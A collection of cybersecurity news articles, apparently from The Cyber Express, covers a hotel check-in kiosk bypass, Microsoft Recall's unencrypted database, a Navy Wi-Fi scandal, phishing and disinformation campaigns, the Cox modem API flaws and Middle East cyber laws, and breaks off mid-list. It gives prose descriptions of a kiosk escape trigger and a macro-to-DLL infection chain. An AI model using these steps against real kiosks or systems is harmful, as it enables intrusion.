Researchers observed a Kiosk mode bypass vulnerability in a remote hotel's check-in terminal during their stay there while traveling to attend a threat modeling workshop. The hotel's terminal operates through the use of the Ariane Allegro Scenario Player. Ariane is an international provider of self-check systems for the hospitality industry, with deployment to more than 3,000 sites across 25 different countries. The researchers discovered the flaw in the check-in system's guest search feature, leading to a crash that allowed for unauthorized access to the underlying system.

Kiosk Mode Bypass Grants Access To Hotel's Windows Desktop

The hotel, which had no check-in staff, relied solely on the self-service check-in terminal running the Ariane Allegro Scenario Player in kiosk mode. Visiting researchers from Pentagrid discovered that the check-in terminal crashed when a single quote character was inserted into its guest search feature. Upon trying to interact with the terminal screen after the crash, the Windows operating system asks the user if it should wait longer or stop the running task. Selecting the second option halts the kiosk mode application entirely, unexpectedly allowing the team to access the underlying Windows Desktop. The researchers attributed the flaw as an accidental discovery by Martin "O'YOLO" Schobert. The researchers state that this bypass poses significant risks as attackers with access to the Windows desktop could potentially target a hotel's entire network, access stored data (including PII, reservations, and invoices), or create room keys for other hotel rooms by exploiting its RFID room-provisioning functionality. The kiosk mode bypass vulnerability has been rated with a CVSS score of 6.8 (medium). The researchers specified the following preconditions as necessary for successful exploitation of the vulnerability:

• Physical access to the check-in terminal along with time, depending upon the attack's preparation.
• The check-in terminal must be in a self-service state, as hotels might enable this option only during specific times or during staff shortage.

According to Ariane Systems, the issue stemmed from the use of outdated versions of its check-in software at the new hotel.

Disclosure Process and Vendor Response

The vulnerability's discovery led the team to investigate further, finding that a hotel chain from Liechtenstein and Switzerland use the check-in terminal for smaller hotel locations. The vulnerability could potentially affect several hotels that rely on Ariane's Allegro Scenario Player check-in system. The researchers first discovered the vulnerability on March 5, 2024, and immediately attempted to disclose it to the vendor through multiple channels, such as LinkedIn, contact numbers and official email addresses. The researchers also attempted to reach out to the company's technical leader and chief product officer, finding a delayed response on March 18 in which Ariane Systems claimed that the reported systems were legacy software models, and that no personally identifiable information (PII) or exploitable data could be retrieved from the kiosk machine. However, the researchers dispute the vendor's claim, stating that the kiosk was designed to produce and keep accessible invoice files. In a later call with Ariane Systems on April 11, further vulnerability details were shared, with the researchers awaiting a response. They state that as of June 5, 2024, there have been no updates from the vendor. They cite the initial delays and lack of additional updates as reasons for publicly disclosing the vulnerability after a waiting period of 90 days. To mitigate potential risks stemming from the vulnerability, the researchers recommended that hotels using the Ariane Allegro Scenario Player check to make sure they have the most recent version of the software installed, as the issue was reportedly fixed by the vendor. Additionally, they advised hotels to isolate check-in terminals to prevent potential bypasses that could allow attackers to compromise hotel networks or underlying Windows systems. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

While Microsoft's forthcoming Recall feature has already sparked security and privacy concerns, the tech giant attempted to downplay those reactions by stating that collected data would remain on the user's device. Despite this reassurance, concerns remain, as researchers - including the developer of a new tool dubbed "TotalRecall" - have observed various inherent vulnerabilities in the local database maintained by Recall, lending credibility to critics of Microsoft's implementation of the AI tool.

TotalRecall Tool Demonstrates Recall's Inherent Vulnerabilities

Recall is a new Windows AI tool planned for Copilot+ PCs that captures screenshots from user devices every five seconds, then storing the data in a local database. The tool's announcement, however, led many to fear that this process would make sensitive information on devices susceptible to unauthorized access. TotalRecall, a new tool developed by Alex Hagenah and named after the 1990 sci-fi film, highlights the potential compromise of this stored information. Hagenah states that the the local database is unencrypted and stores data in plain text format. The researcher likened Recall to spyware, calling it a "Trojan 2.0." TotalRecall was designed to extract and display all the information stored in the Recall database, pulling out screenshots, text data, and other sensitive information, highlighting the potential for abuse by criminal hackers or domestic abusers who may gain physical access to a device. Hagenah's concerns are echoed by others in the cybersecurity community, who have also compared Recall to spyware or stalkerware. Recall captures screenshots of everything displayed on a user's desktop, including messages from encrypted apps like Signal and WhatsApp, websites visited, and all text shown on the PC. TotalRecall can locate and copy the Recall database, parse its data, and generate summaries of the captured information, with features for date range filtering and term searches. Hagenah stated that by releasing the tool on GitHub, he aims to push Microsoft to fully address these security issues before Recall's launch on June 18.

Microsoft Recall Privacy and Security Concerns

Cybersecurity researcher Kevin Beaumont has also developed a website for searching Recall databases, though he has withheld its release to give Microsoft time to make changes. Microsoft's privacy documentation for Recall mentions the ability to disable screenshot saving, pause Recall on the system, filter out applications, and delete data. Nonetheless, the company acknowledges that Recall does not moderate the captured content, which could include sensitive information like passwords, financial details and more. The risks extend beyond individual users, as employees under "bring your own device" policies could leave with significant amounts of company data saved on their laptops. The UK's data protection regulator has requested more information from Microsoft regarding Recall and its privacy implications. Amid criticism over recent hacks affecting US government data, Microsoft CEO Satya Nadella has emphasized its need to prioritize security. However, the issues surrounding Recall demonstrate that security concerns were not given sufficient attention, and necessitate inspection of its data collection practices before its official release. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The U.S. Navy took action against a senior enlisted leader who installed an unauthorized Wi-Fi system aboard a combat ship. According to documents obtained by the Navy Times, Grisel Marrero, the former command senior chief of the littoral combat ship USS Manchester's gold crew, pleaded guilty in March to charges related to the operation of the illicit network and a subsequent cover-up. The network appears to have been set up through the use of a Starlink satellite connected to the ship.

U.S. Navy Chief Attempted to Cover Up Illicit Network

The U.S. Navy began investigating the ship's network installation in June 2023 when a crew member attempted to report the network to the ship's commanding officer. However, Marrero intercepted the tip from being sent and avoided sharing information about the deployment of the Wi-Fi network. The installation was eventually uncovered in August after Marrero edited an image of the ship's Starlink data usage to conceal the Wi-Fi network's activity. Prosecutors believe Marrero attempted this operation to impede pending disciplinary action against another sailor. It is unclear if the sailor was involved with the operation of the Wi-Fi network. Marrero, who had a background in Navy intelligence, was relieved of her leadership position aboard the Manchester in September 2023 due to a "loss of confidence," the Navy's Surface Force Pacific (SURFPAC) command said in a statement. The phrase “loss of confidence” is commonly used as a euphemism among military branches to announce that that enlisted officers and senior leaders have been relieved of their duty and while avoiding specific details or behavior behind the decision such as  performance or  misconduct. Marrero later faced a court-martial, where she pleaded guilty to willful dereliction of duty and making false statements to her superiors. She was also demoted from the E-8 level rank to E-7 as punishment.

Other U.S. Sailors Implicated in the Wi-Fi Scandal

The Navy has also disciplined other sailors in connection with the illegal Wi-Fi network. While details of their involvement are scarce, a spokesperson for the Navy confirmed that other sailors were also punished for their role in the operation of the illicit network. The extent of their punishments is not yet clear, as the spokesman declined to provide further details. The Manchester's gold crew has faced significant changes in the past year, with Marrero and the ship's second-in-command, Cmdr. Matthew Yokeley, both being relieved of their duties. The Manchester, which was in or around San Diego, Hawaii and Guam during Marrero's alleged deeds, is a littoral combat ship assigned to SURFPAC, part of the U.S. Pacific Fleet. The reasons for Yokeley's ouster are unclear, and SURFPAC officials have declined to provide further details. In previous official press releases relating to the dismissal of Navy officers for unspecified reasons, such as the relieving of commodore Richard A. Zaszewski in March 2024, and commodore James Harne from duty in December 2023, the navy often made the following statement:

Navy leaders are held to high standards of personal and professional conduct. They are expected to uphold the highest standards of responsibility, reliability, and leadership, and the Navy holds them accountable when they fall short of those standards.

This incident serves as a reminder of the security concerns stemming from the use of unauthorized networks or digital communications while operating in official military or Navy duty. An official press release from the Navy, along with further information on other punishments involved with the unauthorized network, is expected in the coming months. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Google has announced a new initiative to establish 15 cybersecurity clinics across the US. The move attempts to address escalating cybersecurity threats as well as additional risks and opportunities presented by bleeding-edge technology such as AI. These clinics aim at providing funding, mentorship, and additional resources to higher education institutions, within the area of cybersecurity. The initiative expects that its support of the increase in a skilled and dedicated cybersecurity workforce will help protect critical infrastructure and organizations and help address the cybersecurity skills shortage.

Cybersecurity Clinics Aim At Building Resilient Workforce

The cybersecurity clinic initiative, launched in collaboration with the Consortium of Cybersecurity Clinics, invites higher education institutions to apply for funding to establish new clinics. Approved clinics will receive $1 million in cybersecurity funding, mentorship, Titan Security Keys (phishing-resistant 2FA keys), and scholarships for Google's Cybersecurity Certification. Mentorship from these clinics attempts to serve as a bridge between academic knowledge and real-world application by allowing students to gain important hands-on experience. The clinics will also help regional organizations protect themselves from potential cyber threats. For example, Indiana University cybersecurity clinic students have been helping the local fire department in devising contingency plans for online communications compromise scenarios. At the Rochester Institute of Technology, students helped their local water authority review and improve their IT security configurations across operating sites. Google's collaboration page mentions the list of institutions through which the new cybersecurity clinics will be set up, marking them as 'New Grantees':

• Tougaloo College
• Turtle Mountain Community College
• University of Hawai’i Maui College
• Cyber Center of Excellence (CCOE), San Diego State University (SDSU), California State University San Marcos (CSUSM) and National University
• West Virginia State University
• Dakota State University
• University of North Carolina Greensboro
• University of Arizona
• Franklin Cummings Tech
• Spelman College
• NSI CTC - HUSB
• Northeastern State University in Oklahoma
• Trident Technical College
• Eastern Washington University
• The University of Texas at El Paso

These new clinics add to the ten actively operating cybersecurity clinic grants to various institutes: [caption id="attachment_75177" align="alignnone" width="2164"] Interactive Map Indicating Active Clinics (Source:  cybersecurityclinics.org)[/caption]

• University of Texas at San Antonio
• UC Berkeley
• Rochester Institute of Technology
• Massachusetts Institute of Technology
• Stillman College
• Indiana University
• University of Nevada, Las Vegas
• The University of Alabama
• University of Georgia
• University of Texas at Austin

Clinics Attempt to Focus on Diversity and Inclusivity

In the announcement, Google also affirmed its commitment to foster diversity and inclusivity within the cybersecurity industry. In recognition of these values, Google has has extended its cybersecurity funding support to organizations such as the Computing Alliance of Hispanic-Serving Institutions (CAHSI), Stillman College, and the American Indian Science and Engineering Society (AISES). These institutions aid colleges and universities that served large populations of minorities such as black, Hispanic, indigenous or tribal students. "Cyber attacks are a threat to everyone's security, so it's essential that cyber education is accessible," said a Google spokesperson. "With these newest 15 clinics, we're supporting institutions that serve a variety of students and communities: traditional colleges and universities as well as community and technical colleges in both rural and urban communities." [caption id="attachment_75162" align="alignnone" width="588"] Source: stillman.edu[/caption] Google's investment in these clinics represent a strategic move to address the nation's workforce shortage, with at least 450,000 cybersecurity positions remaining open across the country. Google stated that its new cybersecurity clinics would help impart cybersecurity training to hundreds of students, while increasing its own commitment by $5 million, amounting to a total of about $25 million in support across clinics. The tech giant expects that these moves will help enable the operation of 25 cybersecurity clinics nationwide by 2025. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

noyb (None of Your Business), also known as the European Center for Digital Rights, has filed two complaints under Article 77 of the GDPR against Microsoft, claiming the tech giant violated the privacy rights of school children with its Microsoft 365 Education offering to educational institutions. noyb believes that Microsoft attempted to shift the responsibility and privacy expectations of the GDPR's principles onto the institutions through its contracts, but stated that these organizations had no reasonable means of complying with such requests as they did not maintain control over the collected data.

Shifting Privacy Expectations from Big Tech to Local Schools

The non-profit stated that as schools and educational institutions within the European Union increasingly relied on digital services during the pandemic, big tech companies capitalized on this trend to try to create a new generation of loyal customers. While welcoming the modernization of education, noyb believes that Microsoft has violated several data protection rights while providing educational institutions with access to Microsoft's 365 Education services, leaving students, parents and the institutes themselves with little choice. noyb expressed concern over the market power of software vendors such as Microsoft, which enables them to dictate the terms and conditions of their contracts with schools. This power, the organization alleges, has allowed tech providers to shift the majority of legal responsibilities under the General Data Protection Regulation (GDPR) onto local authorities and educational institutions. noyb states that in reality, neither schools nor local authorities have the ability to influence how Microsoft processes user data. Instead, they often faced a "take-it-or-leave-it" situation, where all decision-making power and profits lay with Microsoft, while the risks are expected to be borne by the schools. "This take-it-or-leave-it approach by software vendors such as Microsoft is shifting all GDPR responsibilities to schools," said Maartje de Graaf, a data protection lawyer at noyb. "Microsoft holds all the key information about data processing in its software, but is pointing the finger at schools when it comes to exercising rights. Schools have no way of complying with the transparency and information obligations."

noyb Believes Countless Children Affected by 'Secret Tracking'

noyb said that students and educational institutions faced a serious lack of transparency in the privacy documentation surrounding the usage of Microsoft's 365 Education services. Instead, students and institutes interested in the usage of data were forced to navigate a maze of privacy policies, documents, terms, and contracts, all of which were found to provide slightly different but consistently vague information about what happens to children's data. "Microsoft provides such vague information that even a qualified lawyer can't fully understand how the company processes personal data in Microsoft 365 Education," said de Graaf. "It is almost impossible for children or their parents to uncover the extent of Microsoft's data collection."

European Center for Digital Rights Files Two Complaints

The alleged violations of information privacy laws led to noyb representing the cases of two complainants against Microsoft. The first complaint cited the case of a father who made requests to obtain personal data collected by Microsoft's 365 Education service on behalf of his daughter, under the articles of the GDPR. Yet Microsoft had redirected the concerned parent to the "data controller," and after checking with Microsoft if the school was the data controller, the parent then reached out to the school who then replied that they only had access to the student's email addresses used for sign-up. In the second complaint, an individual reported that despite not granting consent to cookie or tracking technologies, Microsoft 365 Education had installed cookies analyzing user behavior and collecting browser data, both of which are used for advertising purposes, according to Microsoft's own documentation. This type of invasive profiling was being carried out without the school's knowledge or consent, the non-profit stated. "Our analysis of the data flows is very worrying," said Felix Mikolasch, a data protection lawyer at noyb. "Microsoft 365 Education appears to track users regardless of their age. This practice is likely to affect hundreds of thousands of pupils and students in the EU and EEA. Authorities should finally step up and effectively enforce the rights of minors." noyb has requested the Austrian data protection authority (DSB) to investigate and analyze the data being collected and processed by Microsoft 365 Education, as neither Microsoft’s own privacy documentation, the complainant's requests for access, nor the non-profit’s own research could clarify this process, which it believes violates the transparency provisions mandated by the GDPR. noyb also believes that the authority should impose an additional fine on Microsoft, as it believes the company failed to comply with the right of access, and that all children living in the EU/EEA countries were affected by the uniformity in Microsoft 365 Education's terms & conditions and the privacy documentation of its services across the region. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Cyble Research and Intelligence Labs (CRIL) researchers have observed a new sophisticated phishing campaign from the Belarusian government-linked threat actor "UNC1151" targeting the Ukraine Ministry of Defense to facilitate covert espionage operations. UNC1151 has previously been linked to large-scale, long-running influence campaigns that align with Russia's geopolitical interests and anti-NATO narratives.

UNC1151 Targets Ukraine Ministry of Defense With Phishing Lures

Researchers from Mandiant had earlier tracked the group's operations that were active since at least 2017 as the "Ghostwriter Operation/UNC1151." The researchers concluded that the campaign was aimed at spreading pro-Russian narratives and disinformation to targeted audiences in Ukraine, Lithuania, Latvia and Poland. Recently, CRIL researchers discovered a new campaign from the Belarusian group targeting the Ukrainian and Polish government, with primary focus on the Ukranian Ministry of Defense and the Ukrainian military, with socially-engineered malicious Excel worksheet (XLS) files, since at least April 2024. [caption id="attachment_74785" align="alignnone" width="1081"] 2024 Phishing Lure Targeting Ukraine's Ministry of Defense (Source: Cyble Blog)[/caption] These files, purporting to be official documents, are distributed to victims through the use of spam emails. Once the spreadsheet is opened, an "Enable Content" button attempts to direct victims into inadvertently initiating the execution of an embedded VBA (Visual Basic for Applications) macro. [caption id="attachment_74783" align="alignnone" width="1099"] Source: Cyble Blog[/caption] This malicious macro file drops a shortcut file (LNK) and a malicious DLL (dynamic-link library) file on the victim's system. Execution of the LNK shortcut file then initiates the DLL file through the use of the operating system's built-in Rundll32.exe file (commonly abused to load malicious DLLs), with the DLL leading to the infection of the system through the use of hidden and encrypted seemingly innocuous ".svg" image files. The researchers observed a hidden DLL file upon decrypting these .svg image files, concluding that it likely leads to the final payload, citing a Talos Intelligence study of the group's campaign last year where researchers observed the use of ".jpg" image files to deliver payloads. However, CRIL researchers were unable to retrieve the final encrypted payloads from these .svg files, suggesting improved obfuscation practices. They suspect that the final payload potentially includes the same vicious malware such as njRAT, AgentTesla, and Cobalt Strike that were present in the encrypted .jpg image files observed in the previous campaign. The researchers believe the payload aims at exfiltrating information from infected systems in addition to establishing unauthorized remote control over them.

Previous UNC1151 Campaign and Advancements

Inspection of the lure documents in the recent phishing campaign led the researchers to suspect that it primarily targeted the Ukraine Ministry of Defense. The researchers highlighted the similarity and differences in the recent campaign to an earlier campaign last year targeting the Ukrainian and Polish government, along with their military and civilians. The 2023 campaign similarly operated through the use of Excel and PowerPoint files to trick users into running hidden macro code, which led to the load of malicious .LNK shortcut files and DLL files on the infected system. [caption id="attachment_74782" align="alignnone" width="1099"] Campaign Differences (Source: Cyble Blog)[/caption] However, the newer campaign employed different phishing lures such as images of drones, and the document purports to be from the Ukrainian Ministry of Defense. While the encrypted .jpg image files in the previous campaign directly concealed an .EXE file, the new campaign's .svg image files instead concealed an additional malicious DLL file. This DLL file is loaded into the system's temporary directory (%Temp%) and run through the use of the legitimate Rundll32.exe present on the Windows operating system. The researchers cite these variances as an example of the group's evolving tactics, with a sustained effort to compromise Ukrainian targets for strategic gain. The researchers recommend the use of email filtering systems, verification of the identity of email senders, limiting the execution of scripting languages, setup of network-level monitoring, and regular backup of important data. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Researchers from Microsoft have observed a year-long coordinated campaign by Russian threat actors to influence the public's view of the upcoming 2024 Paris Olympics. The chief effort of these influence operations has involved an AI-generated Tom Cruise movie titled "Olympics Has Fallen," parodying the title of the Hollywood movie "Olympus Has Fallen." In the Russian AI movie, a voice and image impersonation of Tom Cruise appears to discredit the leadership behind the International Olympics Committee. Along with the movie, the influence operations have also disparaged the French nation, French President Emmanuel Macron, and the hosting of the upcoming games in Paris.

Use of AI in Influence Campaigns

These operations were linked to Russian-affiliated threat actors Storm-1679 and Storm-1099. In an effort to sow disinformation and denigrate the International Olympic Committee (IOC), these groups distributed fake videos and spoofed news reports employing the use of AI-generated content, even stoking fears of violence in Paris. Storm-1679 was behind the distribution of the feature-length fake documentary "Olympics Has Fallen" last summer. This movie was produced through the use of an AI voice impersonating the famous American actor Tom Cruise and demonstrated slick, Hollywood-style production values. The movie also featured an official website, while purporting to be from Netflix. The researchers observed the use of evolved tactics throughout the campaign, blending traditional forgeries with cutting-edge AI capabilities. Distribution of the the film included additional AI-generated fake celebrity endorsements that were edited into legitimate videos from Cameo, a service where fans can pay celebrities to read personalized messages or for custom content. These deceptive ads made it appear that the celebrities promoted the anti-Olympic rhetoric in the film.

Stoking Fears of Violence at 2024 Paris Olympics

Along with the spread of anti-Olympics rhetoric from AI-generated deepfakes, the campaign also attempts to sow further discord and stoke public fear of violent occurrences or terrorist incidents during the games. The attempt at fearmongering may be an attempt to reduce the attendance and viewership of the upcoming games. These operations include:

• Spoofed videos under the cover of legitimate news outlets like Euro News and France24 that claim a high percentage of the event's tickets were returned over security concerns.
• Fabricated warnings from the CIA and French intelligence services about potential terror threats that are targeting the event.
• Fake graffiti images suggesting a repeat of the 1972 Munich Olympics massacre that targeted Israeli athletes. Researchers observed a video featuring imagery from the incident, amplified further through the activities of pro-Russian bot accounts.

The researchers warn that these influence efforts could intensify further as the July 26 Opening Ceremony draws near. They predict that the campaign may shift to more automated tactics like bot networks to amplify messaging across different social media. The report stated that these threat actors were known to previously target the Ukrainian refugee community in the U.S. and Europe through similarly spoofed news content attempting to sow fears and spread disinformation.

Previous Russian Influence Attempts on the Olympic Games

While psychological tactics dominate the campaign, the researchers highlight that the new campaign signals the addition of advanced technology in the long history of Russian disinformation operations. The researchers cited examples such as Russia's predecessor, the Soviet Union, attempting to stoke fears before the 1984 Summer Olympics in Los Angeles by spreading pamphlets in Zimbabwe, Sri Lanka and South Korea that non-white competitors would be targeted for violence. In 2016, Russian threat actors hacked into the World Anti-Doping Agency and leaked sensitive medical information about American athletes Serena Williams, Venus Williams, and Simone Biles. In 2018, the "Olympic Destroyer" malware attack against the 2018 Winter Olympics in South Korea disrupted some events and took them offline. In 2020, the U.S. Department of Justice charged two Russian GRU officers with responsibility for the 2018 South Korean Olympics hack. These incidents, along with the recent sophisticated influence campaigns, demonstrate the Russian government's efforts to undercut and defame such international competitions in the eyes of potential attenders and global spectators, largely due to their own long history of tensions with organizations responsible for overseeing these events. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A group of Utah students have taken it upon themselves to counter phishing attempts by using their computer skills to bring down fraudulent websites, thereby protecting potential victims. One of the Davis County high school juniors, Charles Mortensen, developed VEGA. This system aims to protect phishing victims and outsmarting hackers by feeding them false information and rendering their phishing pages useless.

Utah Student Motivated By Personal Connection to Hacking Victims

"All my friends and peers around me got hacked," Mortensen told a local reporter. Mortensen, a student at Davis County High School, said he witnessed a rising tide of hacking incidents within his community. He cited an incident where a friend of his residing in foster care fell victim to an Instagram phishing attempt, jeopardizing her only means of maintaining contact with her mom. Affected by these hacking incidents among his peers, Mortensen took it upon himself to create VEGA (Victims' Empowerment Guard against Attacks). As phishing websites expect victims to enter legitimate information or credentials for compromise, VEGA attempts to subvert these attempts by feeding them fake details such as fake usernames and fake passwords. [caption id="attachment_74527" align="alignnone" width="996"] Source: kslnewsradio.com (Credit: Charles Mortensen)[/caption] Mortensen has stated that he has observed success with the VEGA system's attempts to feed hackers with streams of false information. He was quoted by KSL News Radio as saying, “I can send about half a million requests to one hacker within a night. I just let VEGA run overnight and then normally when I wake up … the website [is] shut down.”

Student Sought Help From Peers With Anti-Phishing System

While Mortensen is limited to running the program on his own personal system for now, he expressed his hopes to get VEGA running on 'a whole bunch of computers.' He claims that VEGA is able to take down thirty phishing sites within a month, and access to more computer systems could allow him to take down thousands of phishing sites in a month. Mortensen is seeking a sponsor to enable him to access more computers systems, allowing him to develop a bigger system that could potentially dismantle much larger volumes of phishing sites. Mortensen is a high school junior at the Davis Catalyst Center and sought help from his friends Regan Hosea and Jordan Kingston in helping him make this system work better after developing the first release of VEGA. If Mortensen's claims of taking down phishing sites are as claimed, they could potentially serve an example of the initial stages of an innovative system to counter phishing, which remains a significant security challenge affecting organizations of all sizes. Mortensen's VEGA system could offer hope to the phishing victims among his peers while fostering further collaboration in developing similar defenses against rising security threats. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Cybersecurity researcher Sam Curry discovered that his home network had been compromised while experimenting with his HTTP traffic setup. The researcher discovered that the intrusion was not limited to specific devices, affecting both his PC and iPhone. Upon further investigation, Curry concluded that the intrusion may have stemmed from a massive breach of Cox modems rather than a localized attack. This intrusion may affect millions of individuals and entire networks, with the attacker being linked to a history of phishing campaigns and router attacks.

Unfamiliar IP Address Replaying Cox Modems HTTP Requests

Curry discovered that an unfamiliar IP address (159.65.76.209) had been intercepting  web traffic requests on his home network while attempting to test out his network's HTTP traffic setup. This suspicious behavior was not tied to a single device, affecting the researcher's iPhone in addition to his computer. [caption id="attachment_74339" align="alignnone" width="2800"] Virus Total Scan of Suspected IP [159.65.76.209] (Source: samcurry.net)[/caption]This led him to believe the incident was much more complicated than a mere localized attack scenario. When the researcher attempted to isolate the intrusion by switching between cloud providers such as AWS (Amazon Web Services) and GCP (Google Cloud Platform), the suspicious activity remained. This led him to suspect that his modem had been compromised. Sam traced the suspicious IP address to Digital Ocean and shared his findings three years later on vacation with his friends, who worked for various threat intelligence companies - and together they proceeded to find out how big the problem was. The researchers were able to link this suspicious IP address to a history of malicious usage such as involvement in hosting content for targeted phishing campaigns on ISG Latam (a South American cybersecurity company), as well as Adidas. The IP address had been used to host over 1,000 domains, all of which followed a pattern of a name followed by six numbers and the top-level domain. This pattern suggests the usage of a domain generation algorithm by the malware operators to rotate C&C server addresses for additional obfuscation. [caption id="attachment_74327" align="alignnone" width="1478"] Source: samcurry.net[/caption] The researcher said it was challenging to understand the attacker's intent, as they had targeted ISG Latam, Adidas and his own modem through the use of the same IP address.

Hidden API Calls and Extent of Compromise

Diving further, the researcher looked for publicly known vulnerabilities in the model of the Cox modem that he owned, but discovered that even three years later there were no known exploits. The researcher confirmed remote management facility within the router while helping a friend set up their Cox Modem, calling the ISP's support number and inquiring if they would be able to remotely push an update to the device in the new location. The support agent disclosed this remote management ability included updating device settings, changing WiFi passwords, and information on connected devices. The researcher theorized a potential backdoor in the router's remote management, focusing on the TR-069 protocol that allows ISPs to remotely administer devices. The researcher had a strong suspicion that this feature or tools that were utilized by the ISP's support teams were being exploited. Upon examination of Cox Business portal’s API, the researcher uncovered numerous unprotected endpoints with potential for extensive unauthorized access from attackers. The researcher believed that the vulnerable API may have access to both residential and business services offered by Cox. [caption id="attachment_74342" align="alignnone" width="2800"] Exposed Hidden API Calls of COX Modems (Source: samcurry.net)[/caption] The researcher was able to exploit the router configuration page to load hidden API documentation, exposing an underlying vulnerability that could theoretically grant hackers control over the modems of millions of Cox customers. Curry disclosed these findings to Cox through their responsible disclosure page. The disclosure led Cox to take down the vulnerable API calls within six hours, with the researcher confirming that they were no longer able to reproduce any of the discovered vulnerabilities the day after. Cox stated that the reported API vector was not observed being exploited in the past, but confirmed that they had no affiliation with the reported DigitalOcean IP address. The researcher stated that this indicated that his device had been compromised through an alternative method than disclosed in his blog and to the ISP service. The compromise of the researcher's device along with his own disclosure after discovering vulnerabilities in the modem's hidden API calls are examples of the inherent risks in remotely managed systems. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The META region (Middle-East, Turkey, and Africa) is experiencing a digital surge, with interconnectedness weaving its way into businesses, governments, and individual lives. This burgeoning digital landscape, however, comes with a dark side: a rising tide of cyber threats ranging from simple phishing attacks to sophisticated ransomware and espionage campaigns. Recognizing this, governments across the region are actively building their cyber defenses, enacting a complex tapestry of cybersecurity laws and regulations.  Forming robust cybersecurity regulations for Middle-East governments and businesses is not merely a legal obligation; it is also a strategic imperative to safeguard data, privacy, and stability of operations.  Understanding the intricate web of cybersecurity laws is paramount for businesses and individuals to navigate the digital landscape while avoiding unforeseen risks. 

Recommendations in Building a Strong Cyber Ecosystem and Drafting Adequate Laws

To effectively combat cyber threats, a strategic approach to law implementation and regulation is paramount. This approach should pay special attention to understanding the needs of all involved in the ecosystem, understanding their needs, and fostering collaboration through integrated planning and implementation. Key elements include: 

• Establish a Central National Cybersecurity Body and Strategy: This independent body should define and supervise the national cybersecurity agenda to ensure credibility and authority over public and private organizations.
• Identifying and Addressing Stakeholder Needs: Mapping out key private and public entities, including government agencies, businesses, and cybersecurity firms, and outlining their roles in the national cybersecurity program. 
• Establish Dialogue: Governments and businesses should foster dialogue across stakeholders to encourage collaboration. This could take the form of a governance body assessing the specific needs of each stakeholder, such as access to threat intelligence, training, or technical expertise, and incorporating these needs into a holistic cybersecurity program. 
• Co-ordinated Efforts and Planning: Governments and authorities must create a collaborative approach that ensures participation from all stakeholders while avoiding siloed efforts. 
• Adopt National Information Security Policies: Develop, implement, and update national cybersecurity policies and strategies with thorough funding and political support that are publically considered and reviewed regularly.  
• Develop Personal Data Protection Legislation: Create and implement comprehensive legislation to protect personal data, combat cybercrime, and maintain digital security. 
• Protect Critical Information Infrastructure: Identify critical infrastructure sectors and prioritize their protection. Governments should ensure the security of power supply networks, diversify providers, and encourage local enterprises to safeguard critical information. 
• Create National Cyber Incident Response Teams: National CIRTs should monitor threats and help organizations recover. Countries with existing CIRTs should establish sectoral teams and collaborate regionally. 
• Cooperate Internationally: Support regional and international efforts to combat cybercrime, share evidence, and extradite cybercriminals. International collaboration keeps governments informed about cyberthreats and strengthens cybersecurity norms. 

Key Trends in Cybersecurity Regulations Across the Region

• Data Protection: Data localization, where companies are required to store data within national borders, is becoming increasingly common. Countries like Saudi Arabia and the UAE have implemented strict data protection laws, mirroring the European Union's General Data Protection Regulation (GDPR). 
• Critical Infrastructure Protection: Governments are prioritizing the protection of critical infrastructure from cyberattacks. Countries like Israel and Turkey have established dedicated cybersecurity agencies and implemented regulations for operators of critical infrastructure in sectors like energy, finance, and healthcare. 
• Cybercrime Legislation: Laws addressing cybercrime, including hacking, phishing, and online fraud, are being strengthened. For instance, Egypt recently introduced a comprehensive cybercrime law with severe penalties for offenders.  
• Incident Reporting: Mandatory incident reporting requirements are becoming increasingly common. Companies are obligated to report cybersecurity incidents to relevant authorities, allowing for timely response and mitigation. 

Country-Specific Examples of Cybersecurity Regulations:

Middle-East 

United Arab Emirates (UAE)

The UAE stands out for its proactive approach to cybersecurity regulation. 

• UAE Cybercrime Law (Federal Decree-Law No. 34 of 2021): Criminalizes a range of cyber activities, from hacking and phishing to spreading misinformation online. Introduces harsh penalties for cybercrimes involving critical infrastructure. 

• National Cybersecurity Strategy (2019): Aims to create a safe and resilient cyber infrastructure in the UAE. Key pillars include enhancing cybersecurity laws and fostering international collaboration. 

• Data Protection Law (Federal Decree-Law No. 45 of 2021): Aligns closely with GDPR principles, securing personal data protection and ensuring organizations implement robust data security measures. 

Upcoming Developments in Dubai:

• Critical Infrastructure Protection Framework: A framework to safeguard critical infrastructure against cyber threats.  

Saudi Arabia

Saudi Arabia has adopted a rigorous stance on cybersecurity, reflecting its Vision 2030 ambitions. 

• National Cybersecurity Authority (NCA): Established in 2017 to oversee cybersecurity regulations and policies. 
• Essential Cybersecurity Controls (ECC): Comprehensive cybersecurity guidelines mandated by the NCA. 
• Personal Data Protection Law (2021): Grants citizens more control over their personal data and aligns with international standards.
• Anti-Cyber Crime Law (2007): Covers offenses like hacking, phishing, and electronic fraud. 
• In a move indicative of its rapid development, the NCA introduced a new regulatory framework in 2024 to bolster the cybersecurity landscape. 
• Managed Security Operation Centre (MSOC) Policy: The policy aims to regulate MSOC services and restricts organizations from providing services cross-border rather than sharing with the entire ecosystem.  

Upcoming Developments in Saudi Arabia: 

• National Cybersecurity Strategy 2023-2027: Expected to emphasize incident response, international collaboration, and innovation. 

Qatar

